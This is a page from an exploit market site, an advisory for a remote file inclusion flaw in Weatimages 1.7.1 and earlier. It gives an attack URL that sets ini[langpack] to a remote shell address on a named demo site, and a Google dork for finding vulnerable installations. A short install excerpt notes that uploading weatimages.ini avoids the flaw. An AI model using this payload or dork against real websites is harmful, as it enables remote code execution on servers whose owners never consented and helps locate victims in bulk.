[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Weatimages <= 1.7.1 ini[langpack] Remote File Inclusion Vulnerability

Author
Co-Sarper-Der
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1730
Category
web applications
Date add
09-04-2007
Platform
unsorted
=====================================================================
Weatimages <= 1.7.1 ini[langpack] Remote File Inclusion Vulnerability
=====================================================================



RFI Weatimages Hack
Script name : Weatimages
Script Download Adress:http://www.hotscripts.com/jump.php?listing_id=52592&jump_type=1
Demo site:http://www.nazarkin.name/projects/weatimages/demo/index.php?ini[langpack]=shelladress
Google Dork : inurl: index.php?ini[langpack]=

Author:Co-Sarper-Der
Note:Thanx to ForeveRIslam

side note:

4. Installation

Unpack file "index.php" from this archive and upload it to separate directory (e.g. "photos/") on your web server.
In order to enable caching capabilities, you need to create the new directory named "weatimages-cache" in directory 
with "index.php" and to set access rights 777 (rwxrwxrwx) to "weatimages-cache".
If you plan to customize configuration, upload "weatimages.ini" too.

If weatimages.ini was uploaded too then the product isn't vulnerable.



#  0day.today [2024-11-15]  #